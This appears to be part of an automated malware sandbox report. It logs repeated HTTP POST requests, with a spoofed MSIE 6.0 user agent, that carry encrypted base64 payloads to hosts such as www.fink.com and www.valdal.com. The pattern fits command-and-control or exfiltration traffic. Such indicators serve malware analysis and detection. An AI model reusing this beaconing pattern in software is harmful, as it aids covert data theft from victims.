                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 51 53 61 36 6c 57 4b 64 31 59 30 45 69 45 58 57 31 66 32 4f 36 2b 56 45 56 4f 6e 79 44 44 6d 57 74 6b 46 4d 6c 2b 70 6f 37 4c 62 77 56 4a 58 56 4f 37 34 62 74 4d 59 41 65 75 42 41 47 42 6f 31 69 70 2b 67 76 44 44 35 38 41 45 41 73 67 39 75 35 4d 77 51 35 6e 71 6c 30 68 4a 43 49 66 70 33 46 4e 73 50 61 44 71 6f 6f 63 6d 67 48 6f 42 4a 59 4a 6f 42 4d 57 6a 53 30 32 55 7a 41 6d 6a 50 46 6e 37 4f 77 71 53 52 39 35 4b 79 66 68 6c 30 54 58 77 65 6e 4e 52 6a 77 59 57 65 33 34 49 74 6f 6e 75 54 33 6d 78 37 43 70 51 37 78 41 6b 4a 2f 51 59 41 4b 69 42 65 79 33 59 31 62 54 2b 65 56 31 62 35 41 39 45 35 34 79 30 5a 36 70 54 4a 59 4d 36 67 4a 41 76 77 53 6d 2b 59 56 70 48 4e 33 7a 47 64 6e 31 68 2b 37 7a 55 6a 59 6b 75 53 51 7a 64 42 47 59 2f 6a 44 6d 53 54 71 51 2f 34 58 7a 6d 43 4d 69 37 55 61 69 52 6c 34 2b 50 4f 42 62 6d 55 57 47 4e 49 4a 77 63 6c 57 4c 51 5a 59 4c 4e 66 41 52 33 64 78 33 46 64 39 4b 4b 77 78 6d 6a 73 5a 73 2f 4a 50 54 6a 50 79 68 46 4a 42 44 75 32 67 55 61 4b 39 36 2f 71 54 33 2f 6b 4a 31 66 36 32 4c 46 44 7a 58 50 50 79 45 64 56 6f 69 61 4a 33 49 30 31 73 6c 4e 4a 61 45 32 57 45 6b 30 4a 70 56 75 46 71 6c 4d 53 4a 45 44 2b 54 34 32 6c 71 4b 4a 41 72 65 54 46 55 4c 70 47 36 61 76 59 79 77 66 4c 55 33 70 54 4c 63 73 67 64 57 2f 50 37 75 38 78 65 4a 69 75 4e 2f 48 70 31 32 68 57 36 51 6d 53 76 65 6d 65 57 59 6c 50 6e 75 6f 6c 6a 44 61 4a 46 35 5a 55 75 45 61 7a 44 77 49 44 34 30 75 34 59 59 6a 2b 70 57 62 73 79 30 49 52 50 6d 47 6e 6b 42 4b 32 67 59 79 4f 36 42 38 48 63 5a 45 70 47 35 75 47 4f 52 67 77 70 62 65 50 62 46 34 2b 56 41 6a 30 47 49 34 63 5a 52 6a 58 65 79 32 69 58 37 44 45 6e 48 77 3d Data Ascii: QSa6lWKd1Y0EiEXW1f2O6+VEVOnyDDmWtkFMl+po7LbwVJXVO74btMYAeuBAGBo1ip+gvDD58AEAsg9u5MwQ5nql0hJCIfp3FNsPaDqoocmgHoBJYJoBMWjS02UzAmjPFn7OwqSR95Kyfhl0TXwenNRjwYWe34ItonuT3mx7CpQ7xAkJ/QYAKiBey3Y1bT+eV1b5A9E54y0Z6pTJYM6gJAvwSm+YVpHN3zGdn1h+7zUjYkuSQzdBGY/jDmSTqQ/4XzmCMi7UaiRl4+POBbmUWGNIJwclWLQZYLNfAR3dx3Fd9KKwxmjsZs/JPTjPyhFJBDu2gUaK96/qT3/kJ1f62LFDzXPPyEdVoiaJ3I01slNJaE2WEk0JpVuFqlMSJED+T42lqKJAreTFULpG6avYywfLU3pTLcsgdW/P7u8xeJiuN/Hp12hW6QmSvemeWYlPnuoljDaJF5ZUuEazDwID40u4YYj+pWbsy0IRPmGnkBK2gYyO6B8HcZEpG5uGORgwpbePbF4+VAj0GI4cZRjXey2iX7DEnHw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 5a 6f 4e 78 53 51 31 6c 59 6c 57 78 36 42 2f 6f 68 45 50 32 70 4d 61 49 62 55 64 37 49 62 6b 50 6b 65 34 49 43 63 39 33 58 72 6b 46 56 31 30 48 73 70 31 6f 4d 4a 42 69 67 66 46 32 54 6d 6b 73 64 33 4e 49 6a 41 50 75 5a 71 4b 36 36 74 31 35 69 43 72 61 44 70 34 31 41 4b 63 73 4d 6d 32 2f 2f 41 66 35 31 2b 69 7a 47 6b 48 68 79 75 4f 48 6c 79 75 4b 45 77 69 7a 4f 44 52 44 41 4f 53 43 31 68 79 62 70 71 68 32 4f 4e 6c 59 48 63 5a 42 33 31 72 70 73 55 73 2b 4d 2b 32 64 55 44 71 77 6e 31 63 6e 45 6a 38 66 76 30 49 69 55 47 2b 54 73 64 68 70 30 50 34 6b 56 67 61 33 4a 77 47 47 79 46 32 63 61 69 6c 71 4a 33 43 73 76 47 33 73 72 47 75 2f 32 46 38 37 69 48 39 50 4e 43 43 72 56 32 75 2b 67 4c 6a 73 7a 32 38 7a 65 32 2b 50 53 34 49 64 37 4a 48 55 51 69 5a 55 2b 68 5a 41 72 57 73 50 59 77 61 46 53 58 35 69 56 7a 45 57 47 33 46 6e 64 77 38 39 45 54 7a 2b 6d 30 66 62 63 41 4e 56 69 36 6d 4c 64 6f 67 52 53 50 73 66 50 39 79 73 4e 49 4e 58 69 72 6c 4d 68 78 58 37 58 52 52 79 36 78 6c 51 32 75 78 70 31 46 7a 42 4a 32 43 53 77 76 52 56 43 41 4d 67 6d 66 75 65 4a 30 56 74 70 34 34 58 47 72 65 38 39 4d 72 48 75 68 6d 48 6c 35 71 6b 62 65 72 4a 72 46 63 32 47 5a 6d 56 32 63 64 75 70 76 62 6c 77 7a 36 53 79 77 51 32 71 6b 62 6b 6f 4e 47 7a 37 44 72 71 57 35 79 4d 6f 53 4f 47 6f 39 54 51 61 32 52 62 47 55 6a 41 6f 71 45 32 74 71 49 6d 61 61 6c 6f 71 52 79 63 6c 6f 34 71 72 38 61 59 58 42 62 37 30 4c 73 65 59 79 73 52 57 53 52 6f 32 52 35 76 76 35 39 6e 4e 59 33 66 46 31 75 69 36 57 7a 44 69 42 42 34 65 49 61 32 52 6d 51 6f 52 6b 33 35 38 42 52 69 33 75 63 4f 55 47 39 47 48 30 31 38 70 72 61 6f 68 6d 48 51 65 55 4f 34 54 64 69 63 46 78 67 44 52 37 7a 75 69 5a 30 65 36 43 4f 45 69 35 4e 73 74 6e 6f 6f 6d 73 68 48 63 4c 74 6a 68 41 3d 3d Data Ascii: ZoNxSQ1lYlWx6B/ohEP2pMaIbUd7IbkPke4ICc93XrkFV10Hsp1oMJBigfF2Tmksd3NIjAPuZqK66t15iCraDp41AKcsMm2//Af51+izGkHhyuOHlyuKEwizODRDAOSC1hybpqh2ONlYHcZB31rpsUs+M+2dUDqwn1cnEj8fv0IiUG+Tsdhp0P4kVga3JwGGyF2cailqJ3CsvG3srGu/2F87iH9PNCCrV2u+gLjsz28ze2+PS4Id7JHUQiZU+hZArWsPYwaFSX5iVzEWG3Fndw89ETz+m0fbcANVi6mLdogRSPsfP9ysNINXirlMhxX7XRRy6xlQ2uxp1FzBJ2CSwvRVCAMgmfueJ0Vtp44XGre89MrHuhmHl5qkberJrFc2GZmV2cdupvblwz6SywQ2qkbkoNGz7DrqW5yMoSOGo9TQa2RbGUjAoqE2tqImaaloqRyclo4qr8aYXBb70LseYysRWSRo2R5vv59nNY3fF1ui6WzDiBB4eIa2RmQoRk358BRi3ucOUG9GH018praohmHQeUO4TdicFxgDR7zuiZ0e6COEi5NstnoomshHcLtjhA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 63 34 57 46 2b 4a 59 55 61 46 55 47 70 42 51 42 63 63 4b 52 44 54 6d 71 4f 77 73 32 70 76 51 41 4b 76 4a 6d 39 6e 2f 6e 4f 48 59 43 74 65 59 6d 41 61 6a 5a 46 31 75 59 4e 55 49 49 30 49 72 51 79 42 4f 44 63 6a 4c 69 42 52 41 6e 77 4c 35 49 42 75 33 6c 52 6c 31 59 51 55 62 6c 55 48 43 55 52 4c 45 58 48 65 49 38 65 51 4c 33 56 7a 2f 41 4f 45 30 46 76 53 47 63 6e 52 31 43 2b 78 4f 77 74 54 47 4b 4c 44 62 30 68 72 7a 4d 50 4b 4b 52 34 45 46 41 72 32 61 4d 37 66 79 30 2b 46 56 73 34 7a 68 46 2b 78 35 61 5a 36 6b 2b 30 69 38 4b 53 79 43 50 73 4d 71 5a 59 32 55 4f 4b 75 48 75 49 37 32 56 6f 37 31 67 4d 34 6b 37 6a 75 54 34 52 72 79 47 49 53 43 38 35 73 68 46 2b 42 56 4d 58 6d 59 7a 64 6b 56 2f 34 55 68 33 51 59 4e 76 54 64 53 76 34 38 32 6b 39 72 31 7a 38 67 65 4b 64 6d 4b 6d 34 36 64 72 6f 6e 36 6e 45 4b 4b 55 48 62 48 37 4f 31 76 4b 66 36 59 7a 6d 63 41 59 48 2b 4f 6d 42 5a 31 65 36 74 6d 52 76 39 42 54 61 4b 42 59 4a 4a 51 61 37 55 4f 50 79 57 37 5a 55 76 77 70 6b 6f 4a 7a 30 56 2b 67 6c 51 78 48 44 32 58 53 37 73 67 6b 4c 4d 43 6d 55 46 59 50 43 42 66 51 33 58 31 32 35 2f 70 6a 6d 79 30 6b 66 6b 66 4e 65 63 55 6a 70 55 4f 2b 51 75 4d 43 61 45 2f 72 37 4a 37 2b 4e 77 55 34 74 69 76 5a 70 54 2f 55 4f 70 32 69 66 75 48 38 68 49 68 66 45 42 2f 78 4a 57 71 75 62 67 57 4c 55 64 2b 6e 6e 61 37 54 57 41 4a 32 79 51 2f 46 31 44 70 62 6d 46 66 42 56 6a 73 6d 34 35 69 4f 46 79 55 55 56 52 58 59 77 6e 53 54 6f 78 5a 6a 34 76 34 62 6d 31 44 52 36 77 4a 73 76 35 49 4d 72 43 41 6f 39 55 51 75 61 79 6c 63 43 62 6c 37 67 51 63 2b 51 36 6e 75 76 65 63 54 4f 68 45 62 55 2b 46 44 56 53 78 73 61 50 68 75 68 59 56 6b 51 32 39 79 70 73 6f 30 66 56 51 79 70 4a 57 46 34 73 48 42 41 50 78 32 73 39 72 5a 4b 61 2b 76 6f 6d 5a 6f 2f 57 31 4c 46 62 37 79 52 31 56 6e 2f 77 3d 3d Data Ascii: c4WF+JYUaFUGpBQBccKRDTmqOws2pvQAKvJm9n/nOHYCteYmAajZF1uYNUII0IrQyBODcjLiBRAnwL5IBu3lRl1YQUblUHCURLEXHeI8eQL3Vz/AOE0FvSGcnR1C+xOwtTGKLDb0hrzMPKKR4EFAr2aM7fy0+FVs4zhF+x5aZ6k+0i8KSyCPsMqZY2UOKuHuI72Vo71gM4k7juT4RryGISC85shF+BVMXmYzdkV/4Uh3QYNvTdSv482k9r1z8geKdmKm46dron6nEKKUHbH7O1vKf6YzmcAYH+OmBZ1e6tmRv9BTaKBYJJQa7UOPyW7ZUvwpkoJz0V+glQxHD2XS7sgkLMCmUFYPCBfQ3X125/pjmy0kfkfNecUjpUO+QuMCaE/r7J7+NwU4tivZpT/UOp2ifuH8hIhfEB/xJWqubgWLUd+nna7TWAJ2yQ/F1DpbmFfBVjsm45iOFyUUVRXYwnSToxZj4v4bm1DR6wJsv5IMrCAo9UQuaylcCbl7gQc+Q6nuvecTOhEbU+FDVSxsaPhuhYVkQ29ypso0fVQypJWF4sHBAPx2s9rZKa+vomZo/W1LFb7yR1Vn/w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheCookie: __tad=1688537155.7515757Data Raw: 4a 71 33 69 47 30 72 57 68 6f 31 4c 4d 46 6b 56 72 56 48 6a 45 67 30 36 68 72 44 36 2b 38 41 6d 48 74 32 76 59 74 6c 4b 32 69 43 62 50 77 65 6a 73 52 42 38 69 47 4e 6c 59 67 67 46 59 4a 6e 33 6e 44 62 6f 61 56 31 50 37 6a 62 55 69 36 35 45 72 74 54 59 7a 69 42 4d 2b 6a 50 41 53 56 63 62 71 4c 78 34 68 52 74 54 51 4f 7a 6c 2b 38 4c 2b 52 78 39 75 72 35 53 52 48 30 34 44 6b 50 39 2b 79 78 37 53 4e 53 33 69 42 44 67 45 45 67 49 61 4e 37 54 72 56 41 49 45 42 51 75 49 58 35 52 30 78 39 4e 54 6e 50 55 58 6d 64 42 4a 42 58 71 68 58 39 75 33 42 58 58 4d 66 67 66 65 42 33 70 4b 78 6b 71 66 65 71 69 42 48 4d 4f 42 47 4f 76 66 2b 74 55 2f 4a 49 39 36 6b 4a 4c 4a 6e 4a 67 56 6d 2b 48 37 62 58 31 54 54 52 77 45 71 54 33 6b 5a 4a 45 56 65 45 51 77 4f 77 44 53 70 59 2b 70 74 30 73 49 54 44 6b 67 47 6a 52 41 74 76 73 77 46 49 5a 74 66 4d 41 54 4b 36 54 76 62 6d 6e 73 35 4b 4b 7a 71 6b 70 56 51 59 6f 6e 52 74 5a 6f 5a 6f 4c 33 4e 76 73 2f 51 62 71 5a 37 4e 35 6c 74 6a 6c 71 67 6c 37 45 71 30 46 32 7a 46 59 55 42 41 52 64 37 56 2b 70 30 66 47 65 47 6e 62 52 6a 38 72 62 51 4e 59 66 48 38 77 57 63 31 75 33 44 2f 49 49 34 44 45 7a 2b 6b 31 72 42 51 52 77 67 6c 32 45 6f 35 78 66 51 36 74 66 47 71 34 4b 54 6e 78 2b 47 56 58 46 78 73 64 45 71 49 53 6a 78 66 70 6e 48 31 36 44 69 45 55 37 53 6e 4e 6c 52 58 74 6c 6b 6c 30 51 75 74 6b 79 41 36 33 4d 6a 48 4e 78 4a 66 51 78 45 72 77 79 57 6b 73 73 30 73 74 41 4d 47 37 76 4c 4b 38 55 70 5a 4d 54 44 4b 43 68 67 32 2b 73 37 69 4c 51 66 30 38 59 48 6c 79 75 38 6e 48 57 42 52 57 55 4f 7a 79 50 71 74 4f 69 31 50 6f 69 35 6a 6e 69 31 38 34 41 72 58 62 74 77 34 6b 4e Data Ascii: Jq3iG0rWho1LMFkVrVHjEg06hrD6+8AmHt2vYtlK2iCbPwejsRB8iGNlYggFYJn3nDboaV1P7jbUi65ErtTYziBM+jPASVcbqLx4hRtTQOzl+8L+Rx9ur5SRH04DkP9+yx7SNS3iBDgEEgIaN7TrVAIEBQuIX5R0x9NTnPUXmdBJBXqhX9u3BXXMfgfeB3pKxkqfeqiBHMOBGOvf+tU/JI96kJLJnJgVm+H7bX1TTRwEqT3kZJEVeEQwOwDSpY+pt0sITDkgGjRAtvswFIZtfMATK6Tvbmns5KKzqkpVQYonRtZoZoL3Nvs/QbqZ7N5ltjlqgl7Eq0F2zFYUBARd7V+p0fGeGnbRj8rbQNYfH8wWc1u3D/II4DEz+k1rBQRwgl2Eo5xfQ6tfGq4KTnx+GVXFxsdEqISjxfpnH16DiEU7SnNlRXtlkl0QutkyA63MjHNxJfQxErwyWkss0stAMG7vLK8UpZMTDKChg2+s7iLQf08YHlyu8nHWBRWUOzyPqtOi1Poi5jni184ArXbtw4kN
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 54 33 5a 63 62 53 67 77 64 46 56 54 61 52 6d 34 36 31 56 74 6b 70 74 52 45 70 4d 77 35 72 59 72 33 42 55 6b 46 41 42 75 53 41 32 4d 52 68 34 31 34 57 4f 46 6f 48 62 6a 70 57 6f 42 30 49 69 35 58 36 6c 49 45 6c 66 58 4c 73 4b 5a 6c 74 77 64 65 2b 33 56 4d 52 6d 39 36 69 48 38 6e 2b 41 6d 42 55 44 78 37 37 59 4d 6b 37 76 77 53 2b 4b 48 34 42 41 31 73 65 6e 55 46 4f 50 2f 30 34 31 79 2f 56 4e 6a 38 7a 43 46 74 69 30 4d 6e 55 65 6a 46 4f 73 46 64 39 59 73 52 54 56 46 64 5a 6c 66 69 49 72 36 57 68 2b 6e 37 65 50 47 69 37 62 4f 56 4c 72 6d 70 49 63 2b 33 47 31 59 68 69 48 31 35 65 31 48 79 65 74 67 54 6b 6a 4a 41 42 75 55 76 6c 46 55 48 61 7a 66 38 31 45 4d 54 49 54 36 2b 50 61 72 78 30 67 77 70 6a 68 37 6f 38 55 31 73 62 34 58 6d 4b 54 6d 69 64 4d 78 47 62 2f 4d 78 72 4d 31 73 42 61 4f 55 48 31 43 44 4f 44 67 42 79 4d 4b 72 65 53 43 36 51 67 5a 34 79 79 6c 46 67 6c 6b 33 59 59 4f 67 39 48 41 70 4a 54 53 49 54 49 77 2f 2f 4b 37 56 39 58 57 57 4f 56 4d 6c 6d 35 50 53 31 59 59 6c 30 34 47 79 64 6a 5a 48 74 34 64 4e 6a 30 77 70 38 77 37 6b 6d 31 55 42 44 71 6a 2f 4e 4e 5a 55 59 32 55 57 36 6a 52 34 31 6e 2f 59 47 31 42 58 68 36 50 53 6d 54 57 51 38 4b 30 43 2f 66 38 61 6d 6b 4b 6b 39 59 31 42 64 38 30 53 36 68 56 6f 51 55 61 6c 53 50 45 68 77 7a 34 69 6d 50 56 47 4d 42 44 6f 45 66 44 63 48 43 74 50 52 52 47 33 58 6f 6d 34 76 72 6e 65 6a 2f 63 65 6d 6d 62 5a 2b 67 43 79 67 4c 4c 63 43 39 5a 62 65 66 7a 39 4f 56 37 37 59 77 6b 35 57 4b 78 5a 38 4d 65 33 67 63 79 6b 44 57 31 35 33 6d 63 63 53 69 6f 4f 69 53 35 57 46 62 6e 63 54 71 35 79 6c 58 54 54 4a 68 51 48 34 4f 50 34 42 79 75 4d 35 43 6c 36 53 2f 56 65 4b 4f 59 58 7a 34 6c 4f 79 44 33 64 78 6e 67 53 6b 6c 66 31 52 66 66 6e 6a 5a 49 67 30 66 47 6b 46 67 4f 52 5a 37 53 37 42 73 3d Data Ascii: T3ZcbSgwdFVTaRm461VtkptREpMw5rYr3BUkFABuSA2MRh414WOFoHbjpWoB0Ii5X6lIElfXLsKZltwde+3VMRm96iH8n+AmBUDx77YMk7vwS+KH4BA1senUFOP/041y/VNj8zCFti0MnUejFOsFd9YsRTVFdZlfiIr6Wh+n7ePGi7bOVLrmpIc+3G1YhiH15e1HyetgTkjJABuUvlFUHazf81EMTIT6+Parx0gwpjh7o8U1sb4XmKTmidMxGb/MxrM1sBaOUH1CDODgByMKreSC6QgZ4yylFglk3YYOg9HApJTSITIw//K7V9XWWOVMlm5PS1YYl04GydjZHt4dNj0wp8w7km1UBDqj/NNZUY2UW6jR41n/YG1BXh6PSmTWQ8K0C/f8amkKk9Y1Bd80S6hVoQUalSPEhwz4imPVGMBDoEfDcHCtPRRG3Xom4vrnej/cemmbZ+gCygLLcC9Zbefz9OV77Ywk5WKxZ8Me3gcykDW153mccSioOiS5WFbncTq5ylXTTJhQH4OP4ByuM5Cl6S/VeKOYXz4lOyD3dxngSklf1RffnjZIg0fGkFgORZ7S7Bs=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 32 69 59 67 68 4a 46 71 78 49 33 6f 37 53 42 68 4d 43 49 48 47 75 71 63 2f 73 70 50 7a 36 47 44 56 53 4c 72 71 72 55 4d 64 74 55 32 36 33 30 6c 7a 6a 2b 48 53 43 70 72 69 74 64 71 31 33 43 51 79 59 75 46 36 31 2b 49 59 56 51 6a 59 2f 6b 6a 58 64 4b 30 50 75 2f 46 43 4e 6c 49 4b 7a 2b 35 30 71 62 65 36 31 63 4d 67 52 2b 51 50 59 56 6b 48 69 43 72 78 46 47 34 38 74 4f 58 45 4f 6a 44 72 34 54 31 6b 48 67 43 57 65 2f 58 66 33 35 47 5a 6c 48 4e 4e 65 79 36 7a 37 6a 72 31 5a 4b 76 51 44 75 6d 31 58 50 37 43 35 64 36 46 2b 7a 37 4f 42 79 30 33 4e 51 6f 59 64 59 6d 79 53 77 48 78 74 38 30 44 35 48 79 55 61 4d 77 34 2b 6e 75 4d 69 70 6b 61 55 34 6f 53 31 4b 75 74 51 58 4a 66 62 76 65 79 6d 64 67 6e 44 6a 47 4d 75 41 64 78 4f 6e 33 68 38 77 6d 65 6e 48 2b 48 4f 52 51 52 32 76 52 4d 31 46 48 79 72 79 72 46 6f 70 70 79 69 6e 34 76 46 6f 63 76 72 6f 71 35 76 64 50 33 38 4c 6a 58 30 77 73 6a 2f 75 4d 6a 52 54 56 56 61 54 70 65 77 78 35 72 57 54 6a 45 78 54 59 35 78 74 31 62 63 71 65 36 4b 38 52 53 37 46 2b 77 58 6d 4d 48 6c 47 6e 6a 56 68 63 54 2f 35 72 36 41 58 46 6a 4a 70 72 71 38 4a 43 34 54 4f 72 6f 6a 5a 61 32 55 67 44 69 31 4f 47 63 51 46 58 42 50 50 6d 6f 58 51 4e 50 2f 77 54 69 7a 41 32 57 54 75 42 36 44 4b 41 74 6d 7a 67 74 35 79 62 34 36 68 56 4f 50 38 48 39 66 62 41 49 59 39 31 72 37 52 62 5a 50 51 68 2b 5a 34 61 2f 63 4e 76 55 30 52 76 53 67 38 5a 79 63 42 35 69 54 51 79 76 41 4d 6b 4d 43 31 7a 47 70 32 35 4f 2f 54 4f 4c 6e 4c 6f 6b 36 58 74 74 53 35 6c 65 6c 75 55 30 57 6a 57 67 4d 58 65 42 74 32 74 4e 30 7a 61 52 53 72 68 47 64 41 39 31 33 48 64 4e 4a 75 61 79 50 41 6f 57 36 4d 43 61 59 55 4e 6f 39 52 50 4a 6a 45 55 45 66 69 39 6a 2f 59 4e 56 63 36 65 50 73 68 42 44 48 5a 62 42 47 71 58 7a 69 31 49 72 55 32 66 71 6d 70 35 79 67 70 6f 7a 64 30 3d Data Ascii: 2iYghJFqxI3o7SBhMCIHGuqc/spPz6GDVSLrqrUMdtU2630lzj+HSCpritdq13CQyYuF61+IYVQjY/kjXdK0Pu/FCNlIKz+50qbe61cMgR+QPYVkHiCrxFG48tOXEOjDr4T1kHgCWe/Xf35GZlHNNey6z7jr1ZKvQDum1XP7C5d6F+z7OBy03NQoYdYmySwHxt80D5HyUaMw4+nuMipkaU4oS1KutQXJfbveymdgnDjGMuAdxOn3h8wmenH+HORQR2vRM1FHyryrFoppyin4vFocvroq5vdP38LjX0wsj/uMjRTVVaTpewx5rWTjExTY5xt1bcqe6K8RS7F+wXmMHlGnjVhcT/5r6AXFjJprq8JC4TOrojZa2UgDi1OGcQFXBPPmoXQNP/wTizA2WTuB6DKAtmzgt5yb46hVOP8H9fbAIY91r7RbZPQh+Z4a/cNvU0RvSg8ZycB5iTQyvAMkMC1zGp25O/TOLnLok6XttS5leluU0WjWgMXeBt2tN0zaRSrhGdA913HdNJuayPAoW6MCaYUNo9RPJjEUEfi9j/YNVc6ePshBDHZbBGqXzi1IrU2fqmp5ygpozd0=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 54 33 5a 63 62 53 67 77 64 46 56 54 61 52 6d 34 36 31 56 74 6b 70 74 52 45 70 4d 77 35 72 59 72 33 42 55 6b 46 41 42 75 53 41 32 4d 52 68 34 31 34 57 4f 46 6f 48 62 6a 70 57 6f 42 30 49 69 35 58 36 6c 49 45 6c 66 58 4c 73 4b 5a 6c 74 77 64 65 2b 33 56 4d 52 6d 39 36 69 48 38 6e 2b 41 6d 42 55 44 78 37 37 59 4d 6b 37 76 77 53 2b 4b 48 34 42 41 31 73 65 6e 55 46 4f 50 2f 30 34 31 79 2f 56 4e 6a 38 7a 43 46 74 69 30 4d 6e 55 65 6a 46 4f 73 46 64 39 59 73 52 54 56 46 64 5a 6c 66 69 49 72 36 57 68 2b 6e 37 65 50 47 69 37 62 4f 56 4c 72 6d 70 49 63 2b 33 47 31 59 68 69 48 31 35 65 31 48 79 65 74 67 54 6b 6a 4a 41 42 75 55 76 6c 46 55 48 61 7a 66 38 31 45 4d 54 49 54 36 2b 50 61 72 78 30 67 77 70 6a 68 37 6f 38 55 31 73 62 34 58 6d 4b 54 6d 69 64 4d 78 47 62 2f 4d 78 72 4d 31 73 42 61 4f 55 48 31 43 44 4f 44 67 42 79 4d 4b 72 65 53 43 36 51 67 5a 34 79 79 6c 46 67 6c 6b 33 59 59 4f 67 39 48 41 70 4a 54 53 49 54 49 77 2f 2f 4b 37 56 39 58 57 57 4f 56 4d 6c 6d 35 50 53 31 59 59 6c 30 34 47 79 64 6a 5a 48 74 34 64 4e 6a 30 77 70 38 77 37 6b 6d 31 55 42 44 71 6a 2f 4e 4e 5a 55 59 32 55 57 36 6a 52 34 31 6e 2f 59 47 31 42 58 68 36 50 53 6d 54 57 51 38 4b 30 43 2f 66 38 61 6d 6b 4b 6b 39 59 31 42 64 38 30 53 36 68 56 6f 51 55 61 6c 53 50 45 68 77 7a 34 69 6d 50 56 47 4d 42 44 6f 45 66 44 63 48 43 74 50 52 52 47 33 58 6f 6d 34 76 72 6e 65 6a 2f 63 65 6d 6d 62 5a 2b 67 43 79 67 4c 4c 63 43 39 5a 62 65 66 7a 39 4f 56 37 37 59 77 6b 35 57 4b 78 5a 38 4d 65 33 67 63 79 6b 44 57 31 35 33 6d 63 63 53 69 6f 4f 69 53 35 57 46 62 6e 63 54 71 35 79 6c 58 54 54 4a 68 51 48 34 4f 50 34 42 79 75 4d 35 43 6c 36 53 2f 56 65 4b 4f 59 58 7a 34 6c 4f 79 44 33 64 78 6e 67 53 6b 6c 66 31 52 66 66 6e 6a 5a 49 67 30 66 47 6b 46 67 4f 52 5a 37 53 37 42 73 3d Data Ascii: T3ZcbSgwdFVTaRm461VtkptREpMw5rYr3BUkFABuSA2MRh414WOFoHbjpWoB0Ii5X6lIElfXLsKZltwde+3VMRm96iH8n+AmBUDx77YMk7vwS+KH4BA1senUFOP/041y/VNj8zCFti0MnUejFOsFd9YsRTVFdZlfiIr6Wh+n7ePGi7bOVLrmpIc+3G1YhiH15e1HyetgTkjJABuUvlFUHazf81EMTIT6+Parx0gwpjh7o8U1sb4XmKTmidMxGb/MxrM1sBaOUH1CDODgByMKreSC6QgZ4yylFglk3YYOg9HApJTSITIw//K7V9XWWOVMlm5PS1YYl04GydjZHt4dNj0wp8w7km1UBDqj/NNZUY2UW6jR41n/YG1BXh6PSmTWQ8K0C/f8amkKk9Y1Bd80S6hVoQUalSPEhwz4imPVGMBDoEfDcHCtPRRG3Xom4vrnej/cemmbZ+gCygLLcC9Zbefz9OV77Ywk5WKxZ8Me3gcykDW153mccSioOiS5WFbncTq5ylXTTJhQH4OP4ByuM5Cl6S/VeKOYXz4lOyD3dxngSklf1RffnjZIg0fGkFgORZ7S7Bs=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 50 32 5a 4d 39 4f 2b 52 65 46 58 62 44 54 6c 66 44 70 59 4b 33 76 68 68 6f 6d 30 46 56 64 52 45 6b 77 44 70 51 4a 6e 72 4f 38 55 6b 31 57 55 50 5a 31 5a 38 6b 35 51 79 5a 75 57 52 65 4b 34 54 44 70 32 35 41 4f 2f 56 7a 4a 67 38 59 44 49 7a 4f 46 2b 30 30 76 63 56 66 71 55 6e 65 33 36 6b 41 38 41 57 73 6f 54 4b 63 37 55 36 4b 41 4f 54 79 67 48 74 70 32 63 6c 47 66 46 57 61 2b 32 44 61 37 4a 68 46 54 77 68 2f 4a 59 42 69 68 4d 71 4f 5a 78 43 6b 77 62 44 42 69 4e 46 73 6f 43 6b 56 35 75 69 6f 70 33 61 6a 78 6d 62 68 66 6d 33 50 4e 47 78 62 77 6b 54 73 66 75 41 6e 4e 58 47 33 6e 37 31 66 6f 6b 30 31 50 57 36 75 6e 35 5a 38 74 54 75 46 51 30 31 68 43 6a 36 4f 36 65 32 51 62 37 31 52 67 34 59 4c 75 66 53 62 55 67 31 75 6e 45 54 5a 38 47 6e 6d 4a 52 72 51 2f 58 6e 66 7a 69 5a 51 47 38 7a 6c 4f 39 76 61 48 4b 30 36 33 61 4c 79 66 62 2b 6a 4f 78 76 7a 68 6a 51 44 56 74 50 4d 47 4a 46 50 6b 36 59 4a 33 67 65 54 43 4e 46 72 6a 39 6d 52 66 64 34 78 68 32 78 6f 6b 2f 5a 66 4c 77 73 2b 4e 77 30 6f 66 61 4f 32 55 36 70 61 57 42 78 75 46 78 61 37 5a 63 56 69 4a 4f 76 53 69 46 6f 74 38 37 37 64 4c 73 4d 61 57 45 66 52 46 34 52 69 57 65 34 5a 70 41 4d 58 73 6d 62 78 42 35 43 52 65 4a 4a 6f 42 65 77 48 34 51 41 51 57 72 68 63 71 59 43 45 78 70 33 4e 72 72 62 37 58 49 51 6e 68 4a 70 46 4b 50 2b 52 36 59 4c 68 2f 64 72 35 6c 79 72 71 4b 51 36 7a 53 47 6e 5a 30 79 